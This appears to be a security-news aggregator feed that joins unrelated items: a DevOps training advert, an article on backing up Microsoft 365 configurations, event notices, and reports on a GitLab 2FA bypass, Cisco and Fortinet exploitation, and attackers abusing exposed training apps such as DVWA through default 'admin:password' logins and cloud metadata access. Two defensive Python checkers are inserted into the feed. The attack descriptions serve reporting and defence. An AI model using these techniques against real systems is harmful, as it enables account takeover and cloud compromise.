Testing          Manual           Automated
Scalability      Limited          Elastic
Monitoring       Reactive         Proactive
Security         Post-release     Embedded
Recovery         Slow             Fast
Feedback         Delayed          Continuous
Why this matters: Comparison highlights why DevOps training is essential.
Best Practices & Expert Recommendations
Successful DevOps Trainers in Netherlands emphasize fundamentals first. They promote automation with control. They encourage monitoring from the beginning. They align DevOps practices with business outcomes. This approach ensures sustainability and long-term success.
Why this matters: Best practices prevent future scalability issues.
Who Should Learn or Use DevOps Trainers in Netherlands?
Developers gain insight into deployment pipelines. DevOps engineers refine automation skills. Cloud and SRE teams improve stability. QA teams adopt automated testing. Beginners build strong foundations. Experienced professionals optimize delivery systems.
Why this matters: Broad relevance drives organizational maturity.
FAQs – People Also Ask
What are DevOps Trainers in Netherlands?
They are experts who teach real-world DevOps practices.
Why this matters: Clear definitions improve understanding.
Is DevOps training beginner-friendly?
Yes, trainers adapt learning paths.
Why this matters: Safe entry reduces learning fear.
Do enterprises need DevOps trainers?
Yes, to standardize and scale delivery.
Why this matters: Standardization improves efficiency.
How long does DevOps training take?
It depends on goals and experience.
Why this matters: Planning improves results.
Is DevOps in demand in the Netherlands?
Yes, across multiple industries.
Why this matters: Skills remain future-proof.
Do trainers focus only on tools?
No, they emphasize culture and process.
Why this matters: Sustainable DevOps needs balance.
Can QA teams benefit from DevOps?
Yes, through automation and CI integration.
Why this matters: Quality improves earlier.
Is security included in training?
Yes, through DevSecOps practices.
Why this matters: Security reduces risk.
Do trainers teach cloud platforms?
Yes, AWS, Azure, and GCP concepts.
Why this matters: Cloud skills remain critical.
Does DevOps training improve uptime?
Yes, through monitoring and automation.
Why this matters: Reliability protects users.
Branding & Authority
DevOpsSchool is a globally trusted learning platform delivering enterprise-grade DevOps education through practical and proven methods. Through its programs, DevOpsSchool supports professionals and organizations seeking DevOps Trainers in Netherlands with industry-aligned training models, real-world use cases, and scalable learning frameworks. Enterprises trust this platform for outcome-focused DevOps transformation.
Why this matters: Trusted platforms ensure consistent learning quality.
Rajesh Kumar acts as a senior mentor with more than 20 years of hands-on experience. Through Rajesh Kumar, learners access expert guidance in DevOps, DevSecOps, Site Reliability Engineering, DataOps, AIOps, MLOps, Kubernetes, cloud platforms, CI/CD pipelines, and automation. His mentoring bridges the gap between theory and enterprise execution.
Why this matters: Experienced mentors accelerate skill mastery.
Call to Action & Contact Information
Email: [email protected]
Phone & WhatsApp (India): +91 84094 92687
Phone & WhatsApp (USA): +1 (469) 756-6329
In 2010, Office 365 was a simple suite of Office applications with added e-mail functionality. Fifteen years later, that has changed with Microsoft 365: the suite is an essential element of communication, collaboration and security. Services such as Entra, Intune, Exchange, Defender, Teams and SharePoint carry thousands of configuration details that keep organizations running smoothly and securely. If these are lost, accidentally deleted or deliberately altered, the impact on business operations is enormous.
This is about far more than just data. The tenant configurations are the blueprint for operating the M365 environment. Put simply: if the Microsoft 365 tenant goes down, so does the business.
Despite the enormous importance of tenant configurations, a misconception is widespread in the IT world: around half of all IT leaders wrongly assume that Microsoft's native backup solutions provide comprehensive protection for important tenant configurations, settings and policies. To be clear: Microsoft does not back up the configurations and consequently cannot restore them. Under the shared responsibility model, this is the customer's responsibility.
The importance of tenant configurations
Tenant configurations are the digital foundation of an organization's security posture and operational integrity. They comprise more than 10,000 unique policy elements across critical services. They govern user access, compliance and application behavior, in other words everything that is essential for an organization to run smoothly:
Security settings: This first line of defense includes Conditional Access policies, which define who may access what from where, as well as multi-factor authentication (MFA) rules. If these settings are lost or tampered with, attackers have an easy job and can simply bypass perimeter controls.
Identity management: Almost every organization (95 percent) has been affected by a cloud-related security breach in the past 18 months, and most of these could be traced back to insecure identities. User and group settings, administrator roles and app permissions in Entra ID (formerly Azure AD) form the core of identity security. If these are compromised, the entire framework collapses.
Compliance policies: In regulated industries, proof of compliance is indispensable. Data loss prevention (DLP) policies prevent sensitive information from leaving the organization, while retention policies ensure that data is kept for legal and audit purposes. If an organization cannot prove compliance, it faces severe penalties.
Collaboration settings: Policies in Teams, SharePoint and Exchange govern external sharing, guest access and data flow. If these settings are missing or misconfigured, organizations risk uncontrolled exposure of data, which significantly enlarges the attack surface.
The integrity of these settings is the backbone of any Zero Trust architecture. Without correct configurations, neither the least-privilege principle can be enforced nor compliance maintained. Losing the configurations is therefore not a mere inconvenience but a substantial loss of control over the entire digital infrastructure.
Often overlooked, but essential
The absence of configuration backups is not only a potential security disaster; it also reflects a fundamental misunderstanding of what Microsoft 365 actually is. It is not a simple solution. One way to picture it is as a glass of water: the tenant is the glass and the water is the data.
Not all incidents that endanger configurations are equally severe. At one end of the spectrum, minor tampering with important configurations can be annoying but poses no existential threat to the organization. At the other end, security leaders may be confronted with the large-scale deletion of the identity infrastructure and security controls, a catastrophe with potentially existential consequences for the organization.
When minor misconfigurations occur, such as the accidentally changed permissions of a single user, troubleshooting may take hours but ultimately does not amount to an existential crisis for the organization. It is comparable to a chipped glass: it can still be used without problems or risk, even if it is not ideal.
If a faulty PowerShell script disrupts a particular service for a limited number of users, productivity slows down and business operations are disrupted. However, the damage caused by the script can be reversed, even if the outage is inconvenient and time-consuming. This is comparable to a cracked glass: it is still usable, but the risk to the glass's stability increases.
A complete loss of tenant configurations, finally, leads to massive downtime and means sheer chaos for organizations without configuration backups. Key policies such as authentication, mail flow or access control have been damaged, manipulated or accidentally deleted, rendering the entire digital workspace unusable. The glass has shattered. Only once a new one is available, that is, once the tenant has been securely restored, can one work with the data again (that is, pour the water back in without it immediately leaking out somewhere).
Without configuration backups, including policies, permission settings and user roles, organizations can only return to a secure baseline at an enormous cost in time and resources. There is therefore no way around an intelligent configuration backup. For years, backing up critical data has been a matter of course for organizations. It is high time that backing up the tenant is implemented across the board as well. (jm)
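To make the argument concrete, here is an added example (not from the article and not Microsoft's tooling) of the smallest useful configuration backup: snapshot the tenant's Conditional Access policies and diff a later snapshot against the baseline, flagging a removed policy or one dropped to report-only as critical drift. It assumes the Microsoft Graph v1.0 endpoint `GET /identity/conditionalAccess/policies` with a bearer token obtained elsewhere; the two policy sets below are constructed sample data with placeholder ids so the diff logic runs offline.

```python
"""Snapshot Microsoft 365 Conditional Access policies and flag drift.

Added example, not from the article or from Microsoft. It assumes the Graph v1.0
endpoint GET /identity/conditionalAccess/policies (Policy.Read.All scope) and a
bearer token obtained elsewhere; the policies below are constructed sample data.
"""
from __future__ import annotations

import json
import urllib.request
from datetime import datetime, timezone
from pathlib import Path
from typing import Any

GRAPH_CA_URL = "https://graph.microsoft.com/v1.0/identity/conditionalAccess/policies"

# Policy attributes whose change counts as drift; modification timestamps etc. are noise.
TRACKED_FIELDS = ("displayName", "state", "conditions", "grantControls", "sessionControls")


def fetch_policies(access_token: str) -> list[dict[str, Any]]:
    """Download every CA policy, following Graph's @odata.nextLink paging (network only)."""
    policies: list[dict[str, Any]] = []
    url: str | None = GRAPH_CA_URL
    while url:
        req = urllib.request.Request(url, headers={"Authorization": f"Bearer {access_token}"})
        with urllib.request.urlopen(req) as resp:
            page = json.load(resp)
        policies.extend(page.get("value", []))
        url = page.get("@odata.nextLink")
    return policies


def normalize(policies: list[dict[str, Any]]) -> dict[str, dict[str, Any]]:
    """Index policies by id and keep only tracked fields so two snapshots compare cleanly."""
    return {p["id"]: {f: p.get(f) for f in TRACKED_FIELDS} for p in policies}


def save_snapshot(policies: list[dict[str, Any]], directory: Path) -> Path:
    """Write a timestamped JSON snapshot; keep these in version control or immutable storage."""
    directory.mkdir(parents=True, exist_ok=True)
    stamp = datetime.now(timezone.utc).strftime("%Y%m%dT%H%M%SZ")
    path = directory / f"ca-policies-{stamp}.json"
    path.write_text(json.dumps(normalize(policies), indent=2, sort_keys=True))
    return path


def diff_snapshots(baseline: list[dict[str, Any]], current: list[dict[str, Any]]) -> dict[str, Any]:
    """Compare two policy lists; return added/removed/changed ids and severity-tagged findings."""
    old, new = normalize(baseline), normalize(current)
    added = sorted(set(new) - set(old))
    removed = sorted(set(old) - set(new))
    changed = {pid: [f for f in TRACKED_FIELDS if old[pid][f] != new[pid][f]]
               for pid in sorted(set(old) & set(new))}
    changed = {pid: fields for pid, fields in changed.items() if fields}

    findings: list[tuple[str, str]] = []
    for pid in removed:
        # A deleted policy is the "shattered glass" case: the control itself is gone.
        findings.append(("critical", f"policy removed: {old[pid]['displayName']} ({pid})"))
    for pid, fields in changed.items():
        name = new[pid]["displayName"]
        if "state" in fields and new[pid]["state"] != "enabled":
            # Report-only or disabled means the policy no longer enforces anything.
            findings.append(("critical", f"policy no longer enforced: {name} ({pid}) -> {new[pid]['state']}"))
        else:
            findings.append(("warning", f"policy changed ({', '.join(fields)}): {name} ({pid})"))
    for pid in added:
        findings.append(("info", f"policy added: {new[pid]['displayName']} ({pid})"))
    return {"added": added, "removed": removed, "changed": changed, "findings": findings}


# Constructed sample data shaped like Graph conditionalAccessPolicy objects (ids are placeholders).
BASELINE = [
    {"id": "ca-0001", "displayName": "Require MFA for all users", "state": "enabled",
     "conditions": {"users": {"includeUsers": ["All"]}, "applications": {"includeApplications": ["All"]}},
     "grantControls": {"operator": "OR", "builtInControls": ["mfa"]}, "sessionControls": None},
    {"id": "ca-0002", "displayName": "Block legacy authentication", "state": "enabled",
     "conditions": {"users": {"includeUsers": ["All"]}, "clientAppTypes": ["exchangeActiveSync", "other"]},
     "grantControls": {"operator": "OR", "builtInControls": ["block"]}, "sessionControls": None},
]

# The same tenant after a bad change: MFA dropped to report-only, the legacy-auth block
# deleted, and a new guest-access policy that was never in the baseline.
CURRENT = [
    {**BASELINE[0], "state": "enabledForReportingButNotEnforced"},
    {"id": "ca-0003", "displayName": "Allow guests from partner tenant", "state": "enabled",
     "conditions": {"users": {"includeGuestsOrExternalUsers": {"guestOrExternalUserTypes": "b2bCollaborationGuest"}}},
     "grantControls": {"operator": "OR", "builtInControls": ["compliantDevice"]}, "sessionControls": None},
]


def critical_findings(baseline: list[dict[str, Any]], current: list[dict[str, Any]]) -> list[str]:
    """Only the findings that warrant paging someone."""
    return [msg for sev, msg in diff_snapshots(baseline, current)["findings"] if sev == "critical"]


if __name__ == "__main__":
    for sev, msg in diff_snapshots(BASELINE, CURRENT)["findings"]:
        print(f"[{sev.upper():8}] {msg}")
```

Run it on a schedule against the last committed snapshot and a critical finding becomes an alert before anyone notices a sign-in suddenly succeeding without MFA.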
CISO Middle East Summit – Doha, Qatar | 22nd January 2026
The CISO Middle East Summit 2026, taking place on 22nd January in Doha, Qatar, stands as one of the region’s most anticipated gatherings for cybersecurity leaders, innovators, and policymakers. Under the theme “Digital Freedom & Resilience: The Pillars of Qatar’s Cyber Vision 2030,” the summit will unite key decision-makers from government, critical infrastructure, and enterprise sectors to shape the future of cybersecurity in the Middle East.
The event will feature thought-provoking discussions, strategic insights, and real-world case studies that address the evolving cyber threat landscape and the increasing need for digital trust, resilience, and collaboration. With participation from senior cybersecurity executives, government representatives, and technology experts, the summit will highlight emerging trends in AI security, regulatory evolution, and national cyber defense.
Beyond its knowledge-sharing sessions, the CISO Middle East Summit offers a unique networking platform for CISOs, solution providers, and innovators to connect and explore partnerships that drive the region’s cybersecurity maturity. Supported by leading sponsors and media partners, this one-day event in Doha reinforces Qatar’s growing position as a hub for digital innovation and cyber resilience.
For those driving the next phase of security transformation, this summit is a defining milestone in the Middle East’s cybersecurity journey.
The post CISO Middle East Summit 2026 – Doha appeared first on CISO MAG | Cyber Security Magazine.
CISOs are increasingly turning to AI-enabled security technologies to augment their organizations’ cyber defense and extend the capabilities of their teams.
According to Foundry’s latest Security Priorities Study, 73% of security decision-makers are now more likely to consider a security solution that uses artificial intelligence, up from 59% the year prior.
CISOs plan to leverage AI in a range of security functions, including malware detection, threat detection, anomaly detection, real-time risk prediction, and audit and compliance. They are also eyeing AI for automating security responses, performing authentication, ensuring data loss prevention, and improving enterprise system visibility.
Survey respondents cited AI-enabled benefits such as faster detection of unknown threats, accelerating response times, and automating security tasks to reduce employee workload. The findings are in line with an October 2025 study from management consultancy PwC, which found AI ahead of cloud security and data protection as the top cybersecurity investment priority for enterprises over the next 12 months.
But cutting through the hype to ensure AI investments have optimal impact remains an issue. Experts quizzed by CSO said that security leaders should prioritize AI investment over the next 12 to 18 months to boost anomaly detection, enhance identity and access management, and automate response, but they should also be aware of potential pitfalls such as hallucinations, over-reliance on AI, and governance gaps when implementing AI in their security strategies.
Cutting through the noise
Oliver Newbury, chief strategy officer at cyber resilience vendor Halcyon and previously CISO at Barclays, tells CSO that the “strongest uses of AI in security are the ones that improve visibility and reduce noise.”
“Teams need clearer signals, earlier warnings, and quicker routes to certainty in the middle of an unfolding incident,” Newbury says. “AI that can sift large volumes of activity, highlight meaningful patterns, and present them in a way that analysts can act on immediately is where organizations see real benefit.”
Newbury adds: “These capabilities help shorten investigation time and support faster, confident decision-making during high-pressure situations.”
A human-led approach is no longer sufficient to deal with the increased complexity and volume of threats, many security experts contend. Strategic use of AI technology has the potential to recognize patterns of attack and offer analysts the ability to cut through the noise and make better decisions, freeing up time and resources to deal with higher-value security work and move beyond constant firefighting.
“Most security teams are overloaded, and not because they lack tools, but because they lack time and clear signals,” Newbury says. “AI earns its keep in the areas where speed and pattern recognition genuinely outperform manual effort: behavioral anomaly detection, early-stage threat indicators, and the subtle identity-related activity that often precedes a ransomware event.”
Check against delivery
David Tyler, founder of tech consultancy Outlier Technology, warns that some vendors slap the label ‘AI’ on existing capabilities and raise the price tag, while others are doing solid product development and making real advances.
“A lot of what’s being sold as breakthrough AI is actually decades-old technology finally being implemented properly; this isn’t necessarily bad, as good product management matters as much as novel algorithms,” Tyler says. “But if a vendor’s ‘AI security solution’ appeared overnight in the last couple of years, you’re probably looking at rebranding rather than genuine capability building.”
CSOs should be asking how long the vendor has been investing in these capabilities and what their product evolution looks like, according to Tyler.
“Companies that have been building graph-based correlation, adaptive baselining, and behavioral analytics for a decade are very different from those who just added an AI chat function to their user interface and called it innovation,” Tyler says.
Dr. Andrew Bolster, senior manager of R&D at application security vendor Black Duck, also warns CISOs about vendors slapping neural networks onto existing tools without fixing underlying data quality issues.
“Your AI-powered authentication system is only as good as your identity data hygiene,” Dr. Bolster says. “Your AI-powered malware detection is only as good as your sample corpus quality and labelling accuracy.”
Dr. Bolster adds: “Before signing contracts for AI security platforms, audit your data governance maturity.”
Bolster also argues that CISOs themselves should focus more on how to build an AI-ready security data platform rather than which security tools they need to buy.
“CISOs should invest in data mesh architectures that treat security telemetry as a first-class data product with defined ownership, quality SLAs [service level agreements], and standardized schemes,” he says.
Building an AI security platform
Merlin Gillespie, operations director at managed security services provider Cybanetix, sees the AI security market maturing — and moving away from point solutions that offer reduced operational expenditure toward a more integrated approach. Gillespie warns that this shift creates fresh challenges for security leaders.
“These days every security tool has a layer of AI ‘assistance’ but instead of simplifying operations this is creating overlapping tools, inconsistent reporting, and unclear provenance of data,” according to Gillespie. “The learning is that AI-labelled tools are helpful but aren’t a solution in themselves.”
The exercise most organizations face is classifying which processes are eligible for automation, and which of these are enhanced by the determinism and reasoning of AI, Gillespie advises.
“Security teams should apply the same top-down analysis used across their wider business to support software and personnel efficiency, rather than being led by vendor tooling which can result in further siloing,” Gillespie says.
Potential pitfalls
Halcyon’s Newbury warned that these issues were far from the only potential pitfalls that come from deploying AI systems. For example, over-reliance on AI systems can lead to greater risk.
“AI shouldn’t replace the fundamentals such as asset management, patching, identity governance, proper segmentation, or tested recovery plans,” Newbury says. “Those disciplines matter even more as attackers adopt AI at speed.”
Issues inherited from the inadequate training of AI systems can also create problems.
“AI systems can easily inherit blind spots if they’re trained on narrow or unrealistic datasets,” he says. “CISOs must understand how models are trained and where their assumptions break down.”
Ransomware remains the clearest test of whether AI investment is being prioritized in the right places, Newbury argues.
“Most modern [ransomware] incidents are effectively identity-based attacks,” Newbury says. “Attackers are logging in rather than ‘hacking in,’ often armed with credentials harvested at scale by infostealers.”
Newbury adds: “As adversaries fold AI into their operations, you’ll see more of these attacks landing faster and hitting harder. That makes the resilience question far more urgent.”
Newbury concludes: “AI is worth the investment but only where it sharpens decision-making, reduces noise, and gives teams the time and clarity to act before a problem becomes a crisis.”
View the full article
Lately, the Curl code library has been receiving a lot of AI-generated reports from users hoping to receive financial compensation from the tool’s bug bounty program.
Going through all the reports has taken up so many resources that Curl has decided to eliminate compensation for bug hunters altogether.
“AI slop and generally bad reports have only increased even more recently, so we have to make an attempt to slow down the river so as not to drown,” Curl’s chief administrator Daniel Stenberg said in a comment to Elektroniktidningen.
Over the years, Curl has distributed a total of $101,020 in compensation for bug hunter reports.
Curl is not alone in enduring the significant changes in the bounty industry due to AI-powered bug hunting, which democratizes and accelerates vulnerability discovery while also taxing bug bounty programs with false positives and “AI slop.”
View the full article
WAM Morocco 2026 is organised by KAOUN International (a subsidiary of Dubai World Trade Centre) and proudly in association with GITEX Africa. The debut event is set to be the continent’s largest tech and start-up event in advanced manufacturing and future mobility.
WAM Morocco will take place under the auspices of the Moroccan Ministry of Industry and Trade from 20 – 22 January 2026 at Foire Internationale de Casablanca, Morocco. Expected to draw over 350 exhibitors and more than 20,000 high-level corporate buyers, WAM Morocco will be the hub where the entire industrial innovation ecosystem connects and collaborates.
WAM Morocco features four co-located events World Advanced Future Mobility (WAFM), World Green Energy (WGE), World Pharma Manufacturing (WPM) and World Digital Food Hub (WDFH). Cutting-edge technologies in AI, quantum computing, 3D printing, blockchain and mixed reality will take centre stage at WAM Morocco and drive forward Morocco’s vision of becoming a globally competitive and sustainable manufacturing capital.
The post WAM Morocco appeared first on CISO MAG | Cyber Security Magazine.
View the full article
Cybersecurity company Arctic Wolf has warned of a "new cluster of automated malicious activity" that involves unauthorized firewall configuration changes on Fortinet FortiGate devices. The activity, it said, commenced on January 15, 2026, adding it shares similarities with a December 2025 campaign in which malicious SSO logins on FortiGate appliances were recorded against the admin account from
View the full article
Cisco has released fresh patches to address what it described as a "critical" security vulnerability impacting multiple Unified Communications (CM) products and Webex Calling Dedicated Instance that has been actively exploited as a zero-day in the wild. The vulnerability, CVE-2026-20045 (CVSS score: 8.2), could permit an unauthenticated remote attacker to execute arbitrary commands on the
View the full article
The home hub device that Apple plans to release as soon as this spring has a "robotic swiveling base," according to The Information's Wayne Ma. Ma mentioned the new detail in a piece outlining Apple's work on an AI pin.
We've heard a lot of rumors about the home hub because it was supposed to launch in 2025, but to date, no rumors have suggested that it will have a swiveling robotic base. Bloomberg's Mark Gurman previously said that Apple is developing two versions of the hub, one that's meant to be mounted on the wall and another that has a HomePod mini-like speaker base that can be placed on a desktop or countertop.

No prior descriptions of the home hub base have suggested that it will have any kind of swivel function or that it will be robotic. In fact, the wording sounds similar to how Gurman has described Apple's tabletop robot, which will be a 2027 follow up to the home hub.

Gurman said the tabletop robot will have an iPad-like display mounted on a thin robotic arm that allows the display to tilt up and down and rotate 360 degrees. The device will be able to reposition itself to face whoever is speaking, and it is said to have a "visual personality."

Ma did not go into detail on the purpose of the robotic swiveling base, or how it will work, but presumably it would be able to move to face people. The home hub is supposed to have an array of sensors that let it determine when someone is in the room.

We are expecting the home hub to launch in the coming months, right around the time that Apple debuts iOS 26.4 with the upgraded version of Siri.
Tags: Apple Command Center, Apple Robot
This article, "Apple's Upcoming Home Hub Could Include 'Robotic Swiveling Base'" first appeared on MacRumors.com


View the full article
A critical two-factor authentication bypass vulnerability in the Community and Enterprise editions of the GitLab application development platform has to be patched immediately, say experts.
The hole is one of five vulnerabilities patched Wednesday as part of new versions of GitLab. Three are ranked High in severity, including the 2FA bypass issue, while the other two are ranked Medium in severity.
GitLab says the 2FA hole, CVE-2026-0723, if exploited on an unpatched system, could allow an individual with knowledge of a victim’s ID credentials to bypass two-factor authentication by submitting forged device responses.
It’s this hole that has drawn the attention of experts, because of the implications.
The goal of multifactor authentication is to protect login accounts with an extra verification step in case usernames and passwords are stolen. If a threat actor can access an account, they can do almost unlimited damage to IT systems.
In the case of GitLab, if critical code is sitting in a developer’s account, a threat actor could compromise it, notes David Shipley, head of Canada-based security awareness training firm Beauceron Security. If that code is to be used in software that can be downloaded or sold to other organizations, then inserted malware could be spread in a supply chain attack. The latest example, Shipley said, is the Shai-Hulud worm, which is spreading because a developer’s account in the npm registry was hacked.
If the code contains cloud secrets, he added, the threat actor could gain access to cloud platforms like Azure, Amazon Web Services, or Google Cloud Platform.
Discovery of the 2FA bypass hole “is a reminder that these [security] controls are important,” Shipley said in an interview. “They absolutely help reduce a number of risks: Brute force attacks, password spraying, and so forth. But they will never be infallible.
“This is not the first time someone has found a clever way to get around 2FA challenges. We have a whole series of attacks around session cookie capture which are also designed to defeat 2FA. So it’s important to remember this when someone drops some Silver Bullet thinking that ‘This magic solution solves it [authentication]’ or ‘That’s the bad MFA. Here’s the new MFA.’ And I include [trusting only] Yubikeys,” he said. “Yubikeys are amazing. They’re the next generation of 2FA. But because they are made for humans, eventually they will have some flaws.”
Even if there weren’t flaws in these controls, employees might be tricked into giving up credentials through social engineering, he added.
It would be easier for an attacker to use techniques like phishing to collect user credentials rather than forge a device credential to exploit this particular 2FA bypass, said Johannes Ullrich, dean of research at the SANS Institute. But, he added, once the attacker has access to valid passwords, they can log in to the GitLab server and perform actions on the source code — download it, alter it or delete it — just as a legitimate user would.
What infosec leaders need to do
This is why Cybersecurity 101 — layered defense — is vital for identity and access management, Shipley said. That includes forcing employees to have long, unique login passwords, monitoring the network for unusual activity (for example, if someone gets in without an MFA challenge recorded) and, in case all fails, an incident response plan.
MFA bypass vulnerabilities are very common, noted Ullrich. “The core problem is usually that MFA was added later to an existing product,” he said, “and some features may not properly check if MFA was successfully completed.”
When testing a multifactor authentication solution, infosec leaders should always verify that an application has not marked authentication as completed after the username and password were verified. Enabling MFA should not relax password requirements, he asserted. Users must still pick unique, secure passwords and use password managers to manage them. Secure passwords will mostly mitigate any MFA failures, Ullrich said.
Any vulnerability found in GitLab is significant, he added. GitLab is typically used by organizations concerned enough about the confidentiality of their code that they want to run the platform on premises. 
GitLab ‘strongly’ recommends upgrades
In describing the patches released Wednesday, GitLab said it “strongly” recommends all self-managed GitLab installations be upgraded to one of the three new versions (18.8.2, 18.7.2, 18.6.4) for GitLab Community Edition (CE) and Enterprise Edition (EE). Those using GitLab.com or GitLab Dedicated, a single-tenant software-as-a-service version, don’t have to take any action.
The other vulnerabilities fixed in Wednesday’s updates are:
CVE-2025-13927, a denial of service issue in Jira Connect integration. If exploited on an unpatched system, it could allow an unauthenticated user to create a denial of service condition by sending crafted requests with malformed authentication data. It carries a CVSS severity score of 7.5.
CVE-2025-13928, an incorrect authorization issue. If exploited on an unpatched system, it could allow an unauthenticated user to cause a denial of service condition by exploiting incorrect authorization validation in API endpoints. It carries a CVSS severity score of 7.5.
CVE-2025-13335, an infinite loop issue in Wiki redirects. Under certain circumstances, this hole could allow an authenticated user to create a denial of service condition by configuring malformed Wiki documents that bypass cycle detection. It has a CVSS score of 6.5.
CVE-2026-1102, a denial of service issue in an API endpoint that could allow an unauthenticated user to create a denial of service condition by sending repeated malformed SSH authentication requests. It has a CVSS score of 5.3.
In keeping with standard GitLab practice, details of the security vulnerabilities will be made public on an issue tracker 30 days after the release in which they were patched.
The new versions also include bug fixes, some of which, GitLab said, may include database migrations. In cases of single-node instances, a patch will cause downtime during the upgrade. In the case of multi-node instances, admins who follow proper GitLab zero-downtime upgrade procedures can apply a patch without downtime.
View the full article
Internal testing, product demonstrations, and security training are critical practices in cybersecurity, giving defenders and everyday users the tools and wherewithal to prevent and respond to enterprise threats.
However, according to new research from Pentera Labs, when left in default or misconfigured states, these “test” and “demo” environments are yet another entry point for attackers — and the issue even affects leading security companies and Fortune 500 companies that should know better.
Researchers discovered that popular public training apps like Hackazon, Damn Vulnerable Web Application (DVWA), and OWASP Juice Shop have been frequently left accessible to the public internet, inadvertently exposing top vendors including Palo Alto Networks, Cloudflare, and F5.
“This is not theoretical research,” Noam Yaffe, Pentera’s senior researcher and offensive security team lead, wrote in a technical blog post. His team discovered “clear evidence” that these attack vectors are being exploited in the wild to enable crypto miners, webshells, and persistence mechanisms. The attackers are believed to be of Eastern European origin.
“This research proves that labeling something as ‘training’ or ‘dev’ doesn’t make it invisible to attackers,” Yaffe noted. “If it’s on the internet and it has cloud credentials, it’s a target.”
Exposing crown jewels through seemingly harmless labs
After identifying an exposed instance of Hackazon, a free, intentionally vulnerable test site developed by Deloitte, during a routine cloud security assessment for a client, Yaffe performed a five-step hunt for exposed apps. His team uncovered 1,926 “verified, live, and vulnerable applications,” more than half of which were running on enterprise-owned infrastructure on AWS, Azure, and Google Cloud platforms.
They then discovered 109 exposed credential sets, many accessible via a low-priority lab environment, tied to overly privileged identity and access management (IAM) roles. These often granted “far more access” than a ‘training’ app should, Yaffe explained, and provided attackers:
Administrator-level access to cloud accounts, as well as full access to S3 buckets, GCS, and Azure Blob Storage.
The ability to launch and destroy compute resources and read and write to secrets managers.
Permissions to interact with container registries where images are stored, shared, and deployed.
Attackers maintained persistent access, moved laterally across networks, exploited cloud credentials and other sensitive information, and crypto-mined victim infrastructure. Further, Pentera’s researchers easily discovered active secrets such as Slack keys, GitHub tokens, and Docker Hub credentials, as well as real user data and proprietary source code.
Alarmingly, in DVWA, 54% of instances discovered still used the default credentials ‘admin:password,’ and attackers could downgrade security settings in a single click (from “impossible” to “low”), making every built-in vulnerability “trivially exploitable,” Yaffe noted.
“What began as a harmless lab could lead directly to an organization’s crown jewels,” he said.
Real-world exploitations
In one real-world instance, Pentera’s team discovered a misconfigured buggy web application (bWAPP) linked to Cloudflare cloud accounts running on Google Cloud Platform (GCP). bWAPP is a free, open source, deliberately insecure web app used for training purposes. Querying GCP’s metadata services, the researchers were able to impersonate default service accounts and gain read access to “hundreds” of storage buckets.
Similarly, a DVWA linked to F5’s cloud accounts was found running on a GCP instance, again allowing the researchers to access numerous storage buckets containing logs and metric data. In addition, a misconfigured Palo Alto-linked DVWA app was identified running on AWS; Yaffe and his team used the attached IAM role and temporary credentials to gain full administrative access to the AWS account.
Researchers also exfiltrated OAuth tokens for a GCP service account to assume its identity, and list and access specific bucket content. For instance, one “cloud_build” bucket stored .tgz files that attackers could easily download. The account was managed by an admin email and violated least privilege because it contained policy permission, Yaffe explained.
“Even though this was a ‘dev’/ ‘training’ account, it contained highly sensitive secrets, credentials, and API tokens,” he said.
In assessing these misconfigured, vulnerable applications, his team found “clear evidence” that they were already being fully exploited in the wild. Roughly 20% of the DVWA instances they discovered contained artifacts deployed by malicious actors, including:
XMRig crypto miner actively running, sending proceeds to attacker-controlled wallets, and configured to run silently without user knowledge.
A “sophisticated” watchdog script that maintained persistence even after a compromise had been discovered. This featured self-recovery, automated downloads, encrypted payload delivery, evidence deletion, and kill switches that threat actors could use to easily shut down operations.
A PHP webshell that granted attackers the ability to read, write, delete, upload and download files; run operating system (OS) commands and scripts on remote machines; and access credentials, API keys, and other secrets embedded in source code.
All discoveries were responsibly disclosed to the impacted organizations and were subsequently mitigated prior to publication, Yaffe emphasized.
“These weren’t isolated incidents; they represented an organized, ongoing exploitation campaign,” he warned.
What enterprises can do now
To defend against this widespread threat, Yaffe and his team developed SigInt, a Python-based, large language model (LLM)-powered autonomous reconnaissance framework. The tool, which is available on GitHub, generates fingerprint signatures directly from a live target or GitHub repository, searches for matches, and applies confidence scoring. It also incorporates IP intelligence, cloud provider detection, attribution data, and provides analysis to support further investigation.
Beyond this, Yaffe advised enterprises to “inventory everything” to establish a complete, up-to-date picture of all cloud resources, including ‘temporary’ and ‘test deployments,’ perform regular audits to scan for exposed services, and apply least privilege.
“Never attach broad IAM roles to training or demo environments,” he said.
Further, defenders should isolate training environments from production networks and apply the same monitoring and alerting to them as production environments, restrict their outbound internet access, document and enforce changes to default credentials pre-deployment, and set controls that expire temporary testing environments after a specified timeframe. “If it doesn’t have an end date, it will run forever,” Yaffe noted.
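The recommendations above (inventory everything, least privilege, no broad IAM roles on labs, restricted egress, enforced credential changes, and an expiry on every temporary environment) can be turned into a repeatable check over an asset inventory. The block below is an added example and not Pentera’s SigInt tool or any organization’s code; the inventory record layout, the tag names (`environment`, `owner`, `expires`) and the three sample records are constructed assumptions standing in for what a cloud provider’s asset API would return.

```python
"""Added example (not Pentera's or SigInt's code): a hygiene check over a cloud
asset inventory that flags the lab/demo misconfigurations described in the article.
The record layout, tag names and sample records are constructed for this example."""
from datetime import date

# Intentionally vulnerable training apps named in the research.
TRAINING_APPS = {"dvwa", "juice-shop", "hackazon", "bwapp"}
LAB_ENVIRONMENTS = {"training", "demo", "dev", "test", "lab"}


def _as_list(value):
    return [value] if isinstance(value, str) else list(value or [])


def is_broad_statement(stmt: dict) -> bool:
    """True for an Allow statement granting a wildcard action on every resource."""
    if stmt.get("Effect") != "Allow":
        return False
    actions = _as_list(stmt.get("Action"))
    resources = _as_list(stmt.get("Resource"))
    wildcard_action = any(a == "*" or a.endswith(":*") for a in actions)
    return wildcard_action and "*" in resources


def is_broad_policy(policy: dict) -> bool:
    return any(is_broad_statement(s) for s in policy.get("Statement", []))


def check_resource(res: dict, today: date) -> list[str]:
    """Apply the article's controls to one lab resource; other environments are out of scope here."""
    tags = res.get("tags", {})
    if tags.get("environment", "").lower() not in LAB_ENVIRONMENTS:
        return []
    issues = []
    app = res.get("app", "").lower()
    if res.get("public"):
        what = "training app" if app in TRAINING_APPS else "lab resource"
        issues.append(f"{what} reachable from the internet")
    if any(is_broad_policy(p) for p in res.get("iam_policies", [])):
        issues.append("broad IAM role attached")
    expires = tags.get("expires")
    if not expires:
        issues.append("no expiry tag: will run forever")
    elif date.fromisoformat(expires) < today:
        issues.append(f"expired on {expires} but still running")
    if res.get("default_credentials_changed") is False:   # recorded by the deployment manifest
        issues.append("default credentials still in place")
    if res.get("egress") == "unrestricted":
        issues.append("unrestricted outbound internet access")
    if not tags.get("owner"):
        issues.append("no owner tag")
    return issues


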